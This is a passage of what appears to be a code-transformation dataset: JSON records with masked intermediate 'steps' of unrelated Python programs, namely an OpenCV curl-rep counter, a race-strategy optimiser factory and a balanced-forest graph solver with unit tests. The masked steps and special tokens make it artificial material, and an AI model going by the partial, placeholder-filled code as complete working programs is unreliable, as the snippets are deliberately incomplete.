FONT_HERSHEY_PLAIN, 9, (255, 0, 0), 4)\n bar = np.interp(perc, (0, 100), (800, 200))\n cv2.rectangle(img, (50, 200), (100, 800), color, 3)\n cv2.rectangle(img, (50, int(bar)), (100, 800), color, cv2.FILLED)\n cv2.putText(img, f'{int(perc)}%', (30, 870), cv2.FONT_HERSHEY_PLAIN,\n 4, (255, 0, 0), 4)\n\n\ndef main():\n cap = cv2.VideoCapture('media/1.mp4')\n estimator = PoseEstimator()\n while True:\n _, img = cap.read()\n img = cv2.resize(img, (720, 1280))\n img = estimator.findPose(img)\n lms = estimator.findPosition(img, draw=False)\n if len(lms) > 28:\n estimator.countReps(img, 11, 13, 15)\n cv2.imshow('Correct Pose Estimation', img)\n if cv2.waitKey(1) & 255 == ord('q'):\n cap.release()\n cv2.destroyAllWindows()\n break\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass PoseEstimator(base.PoseDetector):\n\n def __init__(self, mode=False, upperBody=False, smooth=True, detectConf\n =0.5, trackConf=0.5, outFile='output.mp4', outWidth=720, outHeight=1280\n ):\n super().__init__(mode, upperBody, smooth, detectConf, trackConf,\n outFile, outWidth, outHeight)\n self.count = 0\n self.dir = 0\n\n def findAngle(self, img, p1, p2, p3, draw=True):\n x1, y1 = self.lms[p1][1:]\n x2, y2 = self.lms[p2][1:]\n x3, y3 = self.lms[p3][1:]\n angle = math.degrees(math.atan2(y3 - y2, x3 - x2) - math.atan2(y1 -\n y2, x1 - x2))\n if angle < 0:\n angle += 360\n if draw:\n cv2.line(img, (x1, y1), (x2, y2), (255, 255, 255), 2)\n cv2.line(img, (x3, y3), (x2, y2), (255, 255, 255), 2)\n cv2.circle(img, (x1, y1), 8, (0, 0, 255), cv2.FILLED)\n cv2.circle(img, (x1, y1), 12, (0, 0, 255), 2)\n cv2.circle(img, (x2, y2), 8, (0, 0, 255), cv2.FILLED)\n cv2.circle(img, (x2, y2), 12, (0, 0, 255), 2)\n cv2.circle(img, (x3, y3), 8, (0, 0, 255), cv2.FILLED)\n cv2.circle(img, (x3, y3), 12, (0, 0, 255), 2)\n cv2.putText(img, str(int(angle)), (x2 - 40, y2 + 50), cv2.\n FONT_HERSHEY_PLAIN, 2, (255, 0, 255), 2)\n return angle\n\n def countReps(self, img, p1, p2, p3):\n angle = self.findAngle(img, p1, p2, p3)\n perc = np.interp(angle, (210, 320), (0, 100))\n color = 0, 255, 0\n if perc > 95:\n color = 0, 0, 255\n if self.dir == 0:\n self.count += 0.5\n self.dir = 1\n if perc == 0:\n color = 255, 0, 0\n if self.dir == 1:\n self.count += 0.5\n self.dir = 0\n cv2.putText(img, f'{int(self.count)}', (30, 120), cv2.\n FONT_HERSHEY_PLAIN, 9, (255, 0, 0), 4)\n bar = np.interp(perc, (0, 100), (800, 200))\n cv2.rectangle(img, (50, 200), (100, 800), color, 3)\n cv2.rectangle(img, (50, int(bar)), (100, 800), color, cv2.FILLED)\n cv2.putText(img, f'{int(perc)}%', (30, 870), cv2.FONT_HERSHEY_PLAIN,\n 4, (255, 0, 0), 4)\n\n\ndef main():\n cap = cv2.VideoCapture('media/1.mp4')\n estimator = PoseEstimator()\n while True:\n _, img = cap.read()\n img = cv2.resize(img, (720, 1280))\n img = estimator.findPose(img)\n lms = estimator.findPosition(img, draw=False)\n if len(lms) > 28:\n estimator.countReps(img, 11, 13, 15)\n cv2.imshow('Correct Pose Estimation', img)\n if cv2.waitKey(1) & 255 == ord('q'):\n cap.release()\n cv2.destroyAllWindows()\n break\n\n\nif __name__ == '__main__':\n main()\n",
"step-4": "import cv2\nimport mediapipe as mp\nimport base\nimport math\nimport numpy as np\n\n\nclass PoseEstimator(base.PoseDetector):\n\n def __init__(self, mode=False, upperBody=False, smooth=True, detectConf\n =0.5, trackConf=0.5, outFile='output.mp4', outWidth=720, outHeight=1280\n ):\n super().__init__(mode, upperBody, smooth, detectConf, trackConf,\n outFile, outWidth, outHeight)\n self.count = 0\n self.dir = 0\n\n def findAngle(self, img, p1, p2, p3, draw=True):\n x1, y1 = self.lms[p1][1:]\n x2, y2 = self.lms[p2][1:]\n x3, y3 = self.lms[p3][1:]\n angle = math.degrees(math.atan2(y3 - y2, x3 - x2) - math.atan2(y1 -\n y2, x1 - x2))\n if angle < 0:\n angle += 360\n if draw:\n cv2.line(img, (x1, y1), (x2, y2), (255, 255, 255), 2)\n cv2.line(img, (x3, y3), (x2, y2), (255, 255, 255), 2)\n cv2.circle(img, (x1, y1), 8, (0, 0, 255), cv2.FILLED)\n cv2.circle(img, (x1, y1), 12, (0, 0, 255), 2)\n cv2.circle(img, (x2, y2), 8, (0, 0, 255), cv2.FILLED)\n cv2.circle(img, (x2, y2), 12, (0, 0, 255), 2)\n cv2.circle(img, (x3, y3), 8, (0, 0, 255), cv2.FILLED)\n cv2.circle(img, (x3, y3), 12, (0, 0, 255), 2)\n cv2.putText(img, str(int(angle)), (x2 - 40, y2 + 50), cv2.\n FONT_HERSHEY_PLAIN, 2, (255, 0, 255), 2)\n return angle\n\n def countReps(self, img, p1, p2, p3):\n angle = self.findAngle(img, p1, p2, p3)\n perc = np.interp(angle, (210, 320), (0, 100))\n color = 0, 255, 0\n if perc > 95:\n color = 0, 0, 255\n if self.dir == 0:\n self.count += 0.5\n self.dir = 1\n if perc == 0:\n color = 255, 0, 0\n if self.dir == 1:\n self.count += 0.5\n self.dir = 0\n cv2.putText(img, f'{int(self.count)}', (30, 120), cv2.\n FONT_HERSHEY_PLAIN, 9, (255, 0, 0), 4)\n bar = np.interp(perc, (0, 100), (800, 200))\n cv2.rectangle(img, (50, 200), (100, 800), color, 3)\n cv2.rectangle(img, (50, int(bar)), (100, 800), color, cv2.FILLED)\n cv2.putText(img, f'{int(perc)}%', (30, 870), cv2.FONT_HERSHEY_PLAIN,\n 4, (255, 0, 0), 4)\n\n\ndef main():\n cap = cv2.VideoCapture('media/1.mp4')\n estimator = PoseEstimator()\n while True:\n _, img = cap.read()\n img = cv2.resize(img, (720, 1280))\n img = estimator.findPose(img)\n lms = estimator.findPosition(img, draw=False)\n if len(lms) > 28:\n estimator.countReps(img, 11, 13, 15)\n cv2.imshow('Correct Pose Estimation', img)\n if cv2.waitKey(1) & 255 == ord('q'):\n cap.release()\n cv2.destroyAllWindows()\n break\n\n\nif __name__ == '__main__':\n main()\n",
"step-5": "# Counts number of dumbbell curls in the video \n\nimport cv2 \nimport mediapipe as mp \nimport base\nimport math\nimport numpy as np\n\nclass PoseEstimator(base.PoseDetector): \n def __init__(self, mode=False, upperBody = False, smooth=True, detectConf=.5, trackConf=.5, \n outFile=\"output.mp4\", outWidth=720, outHeight=1280):\n super().__init__(mode, upperBody, smooth, detectConf, trackConf, outFile, outWidth, outHeight)\n self.count = 0\n self.dir = 0\n\n def findAngle(self, img, p1, p2, p3, draw=True): \n x1,y1 = self.lms[p1][1:]\n x2,y2 = self.lms[p2][1:]\n x3,y3 = self.lms[p3][1:]\n\n angle = math.degrees(math.atan2(y3-y2,x3-x2) - math.atan2(y1-y2,x1-x2))\n if angle<0: \n angle += 360\n\n if draw: \n cv2.line(img, (x1,y1), (x2,y2), (255,255,255) ,2)\n cv2.line(img, (x3,y3), (x2,y2), (255,255,255) ,2)\n cv2.circle(img, (x1,y1), 8, (0,0,255), cv2.FILLED)\n cv2.circle(img, (x1,y1), 12, (0,0,255), 2)\n cv2.circle(img, (x2,y2), 8, (0,0,255), cv2.FILLED)\n cv2.circle(img, (x2,y2), 12, (0,0,255), 2)\n cv2.circle(img, (x3,y3), 8, (0,0,255), cv2.FILLED)\n cv2.circle(img, (x3,y3), 12, (0,0,255), 2)\n cv2.putText(img, str(int(angle)), (x2-40,y2+50), cv2.FONT_HERSHEY_PLAIN, 2, (255,0,255), 2)\n\n return angle \n \n def countReps(self, img, p1, p2, p3): \n angle = self.findAngle(img, p1, p2, p3) \n perc = np.interp(angle, (210,320), (0,100))\n \n color = (0,255,0)\n if perc > 95: \n color = (0,0,255)\n if self.dir == 0: \n self.count += .5 \n self.dir = 1\n if perc == 0: \n color = (255,0,0)\n if self.dir == 1: \n self.count += .5\n self.dir = 0 \n \n cv2.putText(img, f'{int(self.count)}', (30,120), cv2.FONT_HERSHEY_PLAIN, 9, (255,0,0), 4)\n\n bar = np.interp(perc, (0,100), (800,200))\n cv2.rectangle(img, (50,200), (100,800), color, 3)\n cv2.rectangle(img, (50,int(bar)), (100,800), color, cv2.FILLED)\n cv2.putText(img, f'{int(perc)}%', (30,870), cv2.FONT_HERSHEY_PLAIN, 4, (255,0,0), 4)\n\n\ndef main():\n cap = cv2.VideoCapture(\"media/1.mp4\") \n estimator = PoseEstimator()\n\n while True: \n _, img = cap.read()\n img = cv2.resize(img, (720, 1280))\n\n img = estimator.findPose(img) \n lms = estimator.findPosition(img, draw=False) \n if len(lms)>28: \n estimator.countReps(img,11,13,15)\n\n # estimator.writeFrame(img)\n\n cv2.imshow(\"Correct Pose Estimation\", img)\n if cv2.waitKey(1) & 0xFF == ord('q'):\n cap.release()\n cv2.destroyAllWindows()\n break\n\nif __name__ == \"__main__\": \n main() ",
"step-ids": [
3,
5,
6,
7,
8
]
}
|
[
3,
5,
6,
7,
8
] |
<|reserved_special_token_0|>
class CalulateStrategyWith:
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class CalulateStrategyWith:
<|reserved_special_token_0|>
@staticmethod
def geneticAlgorithm(car, include_initial_tyre=False, generations=1000):
"""
Use genetic evolution to determine the best strategy
Args:
car (Car): An initial car to test with
include_initial_tyre (bool): Include the initial tyre in moves
generations (int): Evolution generation limit
Returns:
Car
"""
return StrategyDeap(car, include_initial_tyre, generations).run()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class CalulateStrategyWith:
@staticmethod
def Annealing(car, include_initial_tyre=False, iterations=100000):
"""
Use simulated annealing to determine the best strategy
Args:
car (Car): An initial car to test with
include_initial_tyre (bool): Include the initial tyre in moves
iterations (int): Iteration limit
Returns:
Car
"""
sim = StrategyAnnealer(car)
sim.setIncludeInitialTyreInMove(include_initial_tyre)
sim.steps = iterations
state, e = sim.anneal()
return state
@staticmethod
def geneticAlgorithm(car, include_initial_tyre=False, generations=1000):
"""
Use genetic evolution to determine the best strategy
Args:
car (Car): An initial car to test with
include_initial_tyre (bool): Include the initial tyre in moves
generations (int): Evolution generation limit
Returns:
Car
"""
return StrategyDeap(car, include_initial_tyre, generations).run()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
from .strategy_annealer import StrategyAnnealer
from .strategy_deap import StrategyDeap
class CalulateStrategyWith:
@staticmethod
def Annealing(car, include_initial_tyre=False, iterations=100000):
"""
Use simulated annealing to determine the best strategy
Args:
car (Car): An initial car to test with
include_initial_tyre (bool): Include the initial tyre in moves
iterations (int): Iteration limit
Returns:
Car
"""
sim = StrategyAnnealer(car)
sim.setIncludeInitialTyreInMove(include_initial_tyre)
sim.steps = iterations
state, e = sim.anneal()
return state
@staticmethod
def geneticAlgorithm(car, include_initial_tyre=False, generations=1000):
"""
Use genetic evolution to determine the best strategy
Args:
car (Car): An initial car to test with
include_initial_tyre (bool): Include the initial tyre in moves
generations (int): Evolution generation limit
Returns:
Car
"""
return StrategyDeap(car, include_initial_tyre, generations).run()
<|reserved_special_token_1|>
'''
    Factory for creating and running simulations against optimization tools
Author:
Matthew Barber <[email protected]>
'''
from .strategy_annealer import StrategyAnnealer
from .strategy_deap import StrategyDeap
class CalulateStrategyWith:
@staticmethod
def Annealing(car, include_initial_tyre=False, iterations=100000):
'''
Use simulated annealing to determine the best strategy
Args:
car (Car): An initial car to test with
include_initial_tyre (bool): Include the initial tyre in moves
iterations (int): Iteration limit
Returns:
Car
'''
sim = StrategyAnnealer(car)
sim.setIncludeInitialTyreInMove(include_initial_tyre)
sim.steps = iterations
state, e = sim.anneal()
return state
@staticmethod
def geneticAlgorithm(car, include_initial_tyre=False, generations=1000):
'''
Use genetic evolution to determine the best strategy
Args:
car (Car): An initial car to test with
include_initial_tyre (bool): Include the initial tyre in moves
generations (int): Evolution generation limit
Returns:
Car
'''
return StrategyDeap(car, include_initial_tyre, generations).run()
|
flexible
|
{
"blob_id": "1cab38721e6b96a9877bd67cbddaa4d6b4e53d1b",
"index": 8175,
"step-1": "<mask token>\n\n\nclass CalulateStrategyWith:\n <mask token>\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass CalulateStrategyWith:\n <mask token>\n\n @staticmethod\n def geneticAlgorithm(car, include_initial_tyre=False, generations=1000):\n \"\"\"\n Use genetic evolution to determine the best strategy\n\n Args:\n car (Car): An initial car to test with\n include_initial_tyre (bool): Include the initial tyre in moves\n generations (int): Evolution generation limit\n\n Returns:\n Car\n \"\"\"\n return StrategyDeap(car, include_initial_tyre, generations).run()\n",
"step-3": "<mask token>\n\n\nclass CalulateStrategyWith:\n\n @staticmethod\n def Annealing(car, include_initial_tyre=False, iterations=100000):\n \"\"\"\n Use simulated annealing to determine the best strategy\n\n Args:\n car (Car): An initial car to test with\n include_initial_tyre (bool): Include the initial tyre in moves\n iterations (int): Iteration limit\n\n Returns:\n Car\n \"\"\"\n sim = StrategyAnnealer(car)\n sim.setIncludeInitialTyreInMove(include_initial_tyre)\n sim.steps = iterations\n state, e = sim.anneal()\n return state\n\n @staticmethod\n def geneticAlgorithm(car, include_initial_tyre=False, generations=1000):\n \"\"\"\n Use genetic evolution to determine the best strategy\n\n Args:\n car (Car): An initial car to test with\n include_initial_tyre (bool): Include the initial tyre in moves\n generations (int): Evolution generation limit\n\n Returns:\n Car\n \"\"\"\n return StrategyDeap(car, include_initial_tyre, generations).run()\n",
"step-4": "<mask token>\nfrom .strategy_annealer import StrategyAnnealer\nfrom .strategy_deap import StrategyDeap\n\n\nclass CalulateStrategyWith:\n\n @staticmethod\n def Annealing(car, include_initial_tyre=False, iterations=100000):\n \"\"\"\n Use simulated annealing to determine the best strategy\n\n Args:\n car (Car): An initial car to test with\n include_initial_tyre (bool): Include the initial tyre in moves\n iterations (int): Iteration limit\n\n Returns:\n Car\n \"\"\"\n sim = StrategyAnnealer(car)\n sim.setIncludeInitialTyreInMove(include_initial_tyre)\n sim.steps = iterations\n state, e = sim.anneal()\n return state\n\n @staticmethod\n def geneticAlgorithm(car, include_initial_tyre=False, generations=1000):\n \"\"\"\n Use genetic evolution to determine the best strategy\n\n Args:\n car (Car): An initial car to test with\n include_initial_tyre (bool): Include the initial tyre in moves\n generations (int): Evolution generation limit\n\n Returns:\n Car\n \"\"\"\n return StrategyDeap(car, include_initial_tyre, generations).run()\n",
"step-5": "'''\n Factory for creating and running ssimulations against optimization tools\n\n Author:\n Matthew Barber <[email protected]>\n'''\nfrom .strategy_annealer import StrategyAnnealer\nfrom .strategy_deap import StrategyDeap\n\n\nclass CalulateStrategyWith:\n @staticmethod\n def Annealing(car, include_initial_tyre=False, iterations=100000):\n '''\n Use simulated annealing to determine the best strategy\n\n Args:\n car (Car): An initial car to test with\n include_initial_tyre (bool): Include the initial tyre in moves\n iterations (int): Iteration limit\n\n Returns:\n Car\n '''\n sim = StrategyAnnealer(car)\n sim.setIncludeInitialTyreInMove(include_initial_tyre)\n sim.steps = iterations\n state, e = sim.anneal()\n return state\n\n @staticmethod\n def geneticAlgorithm(car, include_initial_tyre=False, generations=1000):\n '''\n Use genetic evolution to determine the best strategy\n\n Args:\n car (Car): An initial car to test with\n include_initial_tyre (bool): Include the initial tyre in moves\n generations (int): Evolution generation limit\n\n Returns:\n Car\n '''\n return StrategyDeap(car, include_initial_tyre, generations).run()\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
skipped = 0
class Node(object):
"""docstring for Node"""
def __init__(self, value, indentifier):
super(Node, self).__init__()
self.value = value
self.identifier = indentifier
self.next = None
class Graph(object):
"""docstring for Graph"""
def __init__(self, values, edges):
super(Graph, self).__init__()
self.node_values = values
self.vertices = len(values)
self.edges = edges
self.graph = [None] * self.vertices
# self.edges.sort()
self.grand_sum = sum(self.node_values)
def build_adjacency_list(self):
for edge in self.edges:
fro = edge[0] - 1
to = edge[1]- 1
# Adding the node to the source node
node = Node(self.node_values[to], to)
node.next = self.graph[fro]
self.graph[fro] = node
# Adding the source node to the destination as
# it is the undirected graph
node = Node(self.node_values[fro], fro)
node.next = self.graph[to]
self.graph[to] = node
def print_graph(self):
for i in range(self.vertices):
node = self.graph[i]
print("Vertex:", i)
while(node!=None):
print(node.value, node.identifier)
node = node.next
print("<<"*20)
def get_tree_nodes(self, start_node, nodes, edge, total):
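        # Depth-first collection of every vertex reachable from start_node without crossing the removed edge, accumulating their values into total[0].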
if(start_node==None):
return nodes
while(start_node!=None):
if(start_node.identifier==edge[0] or start_node.identifier==edge[2] or (start_node.identifier in nodes)):
print("skipping ", start_node.identifier)
else:
print("adding ", start_node.identifier)
nodes.append(start_node.identifier)
total[0] += start_node.value
next_n = self.graph[start_node.identifier]
self.get_tree_nodes(next_n, nodes, edge, total)
start_node = start_node.next
return nodes
def split_and_compute_tree_sum(self, t1_nodes = [], t2_nodes = [], edge=[], ton = False):
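        # Cut edge (edge[0], edge[1]): gather the component containing edge[1] into t2_nodes and return both components' value sums.
        # Note the mutable list defaults are a Python gotcha; callers always pass fresh lists, so they are never shared here.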
t1_total = 0
t2_total = 0
total = [0]
start_node = self.graph[edge[1]]
if(start_node.next != None):
t2_nodes = self.get_tree_nodes(start_node, t2_nodes, edge, total)
if(len(t2_nodes)==0 and edge[1]!=edge[2]):
t2_nodes.append(edge[1])
total[0] += self.node_values[edge[1]]
t2_total = total[0]
if(not ton and t2_total < self.grand_sum/2):
for i in range(self.vertices):
if(i not in t2_nodes):
t1_nodes.append(i)
t1_total = self.grand_sum - t2_total
print("t2_nodes", t2_nodes)
print("t2_total", t2_total)
return t1_total, t2_total
def check(self, tree1_total, tree2_total, tree3_total):
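        # Balanced when the two largest sums are equal; the answer is the weight needed to raise the smallest sum to match.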
print("###"*10)
print("FINAL tree1_total: ", tree1_total)
print("FINAL tree2_total: ", tree2_total)
print("FINAL tree3_total: ", tree3_total)
print("###"*10)
if (tree1_total == tree2_total) or (tree1_total == tree3_total) or (tree2_total == tree3_total):
mx = max(tree1_total, tree2_total, tree3_total)
if([tree1_total, tree2_total, tree3_total].count(mx) >= 2):
ret = mx - min(tree1_total, tree2_total, tree3_total)
return ret, True
return -1, False
def split_tree_into_two(self):
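        # Try every edge as the first cut, skipping cuts whose smaller side cannot fall between grand_sum/3 and 2*grand_sum/3.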
ret = -1
found = False
global skipped
for entry in range(self.vertices):
tree1_nodes = []
tree2_nodes = []
tree3_nodes = []
temp_nodes = []
n = self.graph[entry]
while(n!=None):
edge = [entry, n.identifier, -1]
if(n.identifier <= entry):
n = n.next
skipped += 1
continue
print("##MAIN##. SPLIT POINT EDGE: ", edge)
tree1_nodes = []
tree2_nodes = []
tree1_total, tree2_total = self.split_and_compute_tree_sum(tree1_nodes, tree2_nodes, edge)
print("ORIGINALS: ", tree1_total, tree2_total)
if(min(tree1_total, tree2_total) < self.grand_sum/3 or (max(tree1_total, tree2_total) > (2*self.grand_sum)/3)):
n = n.next
continue
if(tree1_total > tree2_total):
ret, found = self.find_third_tree(tree1_total, tree2_total,tree1_nodes, 1, edge[1])
elif(tree2_total > tree1_total):
ret, found = self.find_third_tree(tree1_total, tree2_total,tree2_nodes, 2, edge[0])
elif (tree1_total == tree2_total):
ret = tree1_total
found = True
else:
found = True
if(found):
break
n = n.next
if(found):
break
return ret
def find_third_tree(self, tree1_total, tree2_total, nodes, t = 1, m=0):
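        # Given the first cut, search the heavier component (selected by t) for a second cut that yields three balanceable sums.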
ret , found = -1, False
global skipped
consumed = []
for i in range(len(nodes)):
skip_n = nodes[i]
consumed.append(skip_n)
n = self.graph[skip_n]
while(n!=None):
if(n.identifier in consumed):
n = n.next
skipped += 1
continue
edge = [skip_n, n.identifier, m]
print("2. SPLIT POINT EDGE: ", edge)
print("tree1_total",tree1_total)
tree3_nodes = []
temp_nodes = []
_,tree3_total = self.split_and_compute_tree_sum(temp_nodes, tree3_nodes, edge, True)
if(t==1):
ret , found = self.check(tree1_total - tree3_total, tree2_total, tree3_total)
elif(t==2):
ret , found = self.check(tree1_total, tree2_total - tree3_total, tree3_total)
if(found):
break
n = n.next
if(found):
break
return ret, found
def balancedForest(values, edges):
mygraph = Graph(values, edges)
mygraph.build_adjacency_list()
mygraph.print_graph()
return mygraph.split_tree_into_two()
import unittest
class BalancedForestTest(unittest.TestCase):
def test1(self):
expected = 10
c = [1, 1, 1, 18, 10, 11, 5, 6]
edges = [[1, 2], [1, 4], [2, 3], [1, 8], [8, 7], [7, 6], [5, 7]]
self.assertEqual(balancedForest(c, edges), expected)
def test2(self):
expected = 13
c = [12, 7, 11, 17, 20, 10]
edges = [[1, 2], [2, 3], [4, 5], [6, 5], [1, 4]]
self.assertEqual(balancedForest(c, edges), expected)
def test3(self):
expected = 19
c = [15, 12, 8, 14, 13]
edges = [[4,5],[1,2],[1,3],[1,4]]
self.assertEqual(balancedForest(c, edges), expected)
def test4(self):
expected = 2
c = [1,2,2,1,1]
edges = [[1,2],[1,3],[3,5],[1,4]]
self.assertEqual(balancedForest(c, edges), expected)
def test5(self):
expected = -1
c = [1,3,5]
edges = [[1,3],[1,2]]
self.assertEqual(balancedForest(c, edges), expected)
def test6(self):
expected = -1
c = [7, 7, 4, 1, 1, 1]
edges = [(1, 2), (3, 1), (2, 4), (2, 5), (2, 6)]
self.assertEqual(balancedForest(c, edges), expected)
def test7(self):
expected = 0
c = [1, 3, 4, 4]
edges = [(1, 2), (1, 3), (1, 4)]
self.assertEqual(balancedForest(c, edges), expected)
def test8(self):
expected = 297
c = [100, 99, 98, 100, 99, 98]
edges = [[1, 2], [2, 3], [4, 5], [6, 5], [1, 4]]
self.assertEqual(balancedForest(c, edges), expected)
def test9(self):
expected = 4
c = [12, 10, 8, 12, 14, 12]
edges = [[1, 2], [1, 3], [1, 4], [2, 5], [4, 6]]
self.assertEqual(balancedForest(c, edges), expected)
print("SKIPPED", skipped)
if __name__ == '__main__':
unittest.main()
|
normal
|
{
"blob_id": "e361215c44305f1ecc1cbe9e19345ee08bdd30f5",
"index": 2393,
"step-1": "<mask token>\n\n\nclass BalancedForestTest(unittest.TestCase):\n\n def test1(self):\n expected = 10\n c = [1, 1, 1, 18, 10, 11, 5, 6]\n edges = [[1, 2], [1, 4], [2, 3], [1, 8], [8, 7], [7, 6], [5, 7]]\n self.assertEqual(balancedForest(c, edges), expected)\n <mask token>\n\n def test3(self):\n expected = 19\n c = [15, 12, 8, 14, 13]\n edges = [[4, 5], [1, 2], [1, 3], [1, 4]]\n self.assertEqual(balancedForest(c, edges), expected)\n <mask token>\n\n def test5(self):\n expected = -1\n c = [1, 3, 5]\n edges = [[1, 3], [1, 2]]\n self.assertEqual(balancedForest(c, edges), expected)\n\n def test6(self):\n expected = -1\n c = [7, 7, 4, 1, 1, 1]\n edges = [(1, 2), (3, 1), (2, 4), (2, 5), (2, 6)]\n self.assertEqual(balancedForest(c, edges), expected)\n\n def test7(self):\n expected = 0\n c = [1, 3, 4, 4]\n edges = [(1, 2), (1, 3), (1, 4)]\n self.assertEqual(balancedForest(c, edges), expected)\n\n def test8(self):\n expected = 297\n c = [100, 99, 98, 100, 99, 98]\n edges = [[1, 2], [2, 3], [4, 5], [6, 5], [1, 4]]\n self.assertEqual(balancedForest(c, edges), expected)\n <mask token>\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass Node(object):\n <mask token>\n\n def __init__(self, value, indentifier):\n super(Node, self).__init__()\n self.value = value\n self.identifier = indentifier\n self.next = None\n\n\nclass Graph(object):\n \"\"\"docstring for Graph\"\"\"\n\n def __init__(self, values, edges):\n super(Graph, self).__init__()\n self.node_values = values\n self.vertices = len(values)\n self.edges = edges\n self.graph = [None] * self.vertices\n self.grand_sum = sum(self.node_values)\n\n def build_adjacency_list(self):\n for edge in self.edges:\n fro = edge[0] - 1\n to = edge[1] - 1\n node = Node(self.node_values[to], to)\n node.next = self.graph[fro]\n self.graph[fro] = node\n node = Node(self.node_values[fro], fro)\n node.next = self.graph[to]\n self.graph[to] = node\n\n def print_graph(self):\n for i in range(self.vertices):\n node = self.graph[i]\n print('Vertex:', i)\n while node != None:\n print(node.value, node.identifier)\n node = node.next\n print('<<' * 20)\n\n def get_tree_nodes(self, start_node, nodes, edge, total):\n if start_node == None:\n return nodes\n while start_node != None:\n if start_node.identifier == edge[0\n ] or start_node.identifier == edge[2\n ] or start_node.identifier in nodes:\n print('skipping ', start_node.identifier)\n else:\n print('adding ', start_node.identifier)\n nodes.append(start_node.identifier)\n total[0] += start_node.value\n next_n = self.graph[start_node.identifier]\n self.get_tree_nodes(next_n, nodes, edge, total)\n start_node = start_node.next\n return nodes\n\n def split_and_compute_tree_sum(self, t1_nodes=[], t2_nodes=[], edge=[],\n ton=False):\n t1_total = 0\n t2_total = 0\n total = [0]\n start_node = self.graph[edge[1]]\n if start_node.next != None:\n t2_nodes = self.get_tree_nodes(start_node, t2_nodes, edge, total)\n if len(t2_nodes) == 0 and edge[1] != edge[2]:\n t2_nodes.append(edge[1])\n total[0] += self.node_values[edge[1]]\n t2_total = total[0]\n if not ton and t2_total < self.grand_sum / 2:\n for i in range(self.vertices):\n if i not in t2_nodes:\n t1_nodes.append(i)\n t1_total = self.grand_sum - t2_total\n print('t2_nodes', t2_nodes)\n print('t2_total', t2_total)\n return t1_total, t2_total\n\n def check(self, tree1_total, tree2_total, tree3_total):\n print('###' * 10)\n print('FINAL tree1_total: ', tree1_total)\n print('FINAL tree2_total: ', tree2_total)\n print('FINAL tree3_total: ', tree3_total)\n print('###' * 10)\n if (tree1_total == tree2_total or tree1_total == tree3_total or \n tree2_total == tree3_total):\n mx = max(tree1_total, tree2_total, tree3_total)\n if [tree1_total, tree2_total, tree3_total].count(mx) >= 2:\n ret = mx - min(tree1_total, tree2_total, tree3_total)\n return ret, True\n return -1, False\n\n def split_tree_into_two(self):\n ret = -1\n found = False\n global skipped\n for entry in range(self.vertices):\n tree1_nodes = []\n tree2_nodes = []\n tree3_nodes = []\n temp_nodes = []\n n = self.graph[entry]\n while n != None:\n edge = [entry, n.identifier, -1]\n if n.identifier <= entry:\n n = n.next\n skipped += 1\n continue\n print('##MAIN##. 
SPLIT POINT EDGE: ', edge)\n tree1_nodes = []\n tree2_nodes = []\n tree1_total, tree2_total = self.split_and_compute_tree_sum(\n tree1_nodes, tree2_nodes, edge)\n print('ORIGINALS: ', tree1_total, tree2_total)\n if min(tree1_total, tree2_total) < self.grand_sum / 3 or max(\n tree1_total, tree2_total) > 2 * self.grand_sum / 3:\n n = n.next\n continue\n if tree1_total > tree2_total:\n ret, found = self.find_third_tree(tree1_total,\n tree2_total, tree1_nodes, 1, edge[1])\n elif tree2_total > tree1_total:\n ret, found = self.find_third_tree(tree1_total,\n tree2_total, tree2_nodes, 2, edge[0])\n elif tree1_total == tree2_total:\n ret = tree1_total\n found = True\n else:\n found = True\n if found:\n break\n n = n.next\n if found:\n break\n return ret\n\n def find_third_tree(self, tree1_total, tree2_total, nodes, t=1, m=0):\n ret, found = -1, False\n global skipped\n consumed = []\n for i in range(len(nodes)):\n skip_n = nodes[i]\n consumed.append(skip_n)\n n = self.graph[skip_n]\n while n != None:\n if n.identifier in consumed:\n n = n.next\n skipped += 1\n continue\n edge = [skip_n, n.identifier, m]\n print('2. SPLIT POINT EDGE: ', edge)\n print('tree1_total', tree1_total)\n tree3_nodes = []\n temp_nodes = []\n _, tree3_total = self.split_and_compute_tree_sum(temp_nodes,\n tree3_nodes, edge, True)\n if t == 1:\n ret, found = self.check(tree1_total - tree3_total,\n tree2_total, tree3_total)\n elif t == 2:\n ret, found = self.check(tree1_total, tree2_total -\n tree3_total, tree3_total)\n if found:\n break\n n = n.next\n if found:\n break\n return ret, found\n\n\n<mask token>\n\n\nclass BalancedForestTest(unittest.TestCase):\n\n def test1(self):\n expected = 10\n c = [1, 1, 1, 18, 10, 11, 5, 6]\n edges = [[1, 2], [1, 4], [2, 3], [1, 8], [8, 7], [7, 6], [5, 7]]\n self.assertEqual(balancedForest(c, edges), expected)\n\n def test2(self):\n expected = 13\n c = [12, 7, 11, 17, 20, 10]\n edges = [[1, 2], [2, 3], [4, 5], [6, 5], [1, 4]]\n self.assertEqual(balancedForest(c, edges), expected)\n\n def test3(self):\n expected = 19\n c = [15, 12, 8, 14, 13]\n edges = [[4, 5], [1, 2], [1, 3], [1, 4]]\n self.assertEqual(balancedForest(c, edges), expected)\n\n def test4(self):\n expected = 2\n c = [1, 2, 2, 1, 1]\n edges = [[1, 2], [1, 3], [3, 5], [1, 4]]\n self.assertEqual(balancedForest(c, edges), expected)\n\n def test5(self):\n expected = -1\n c = [1, 3, 5]\n edges = [[1, 3], [1, 2]]\n self.assertEqual(balancedForest(c, edges), expected)\n\n def test6(self):\n expected = -1\n c = [7, 7, 4, 1, 1, 1]\n edges = [(1, 2), (3, 1), (2, 4), (2, 5), (2, 6)]\n self.assertEqual(balancedForest(c, edges), expected)\n\n def test7(self):\n expected = 0\n c = [1, 3, 4, 4]\n edges = [(1, 2), (1, 3), (1, 4)]\n self.assertEqual(balancedForest(c, edges), expected)\n\n def test8(self):\n expected = 297\n c = [100, 99, 98, 100, 99, 98]\n edges = [[1, 2], [2, 3], [4, 5], [6, 5], [1, 4]]\n self.assertEqual(balancedForest(c, edges), expected)\n\n def test9(self):\n expected = 4\n c = [12, 10, 8, 12, 14, 12]\n edges = [[1, 2], [1, 3], [1, 4], [2, 5], [4, 6]]\n self.assertEqual(balancedForest(c, edges), expected)\n print('SKIPPED', skipped)\n\n\n<mask token>\n",
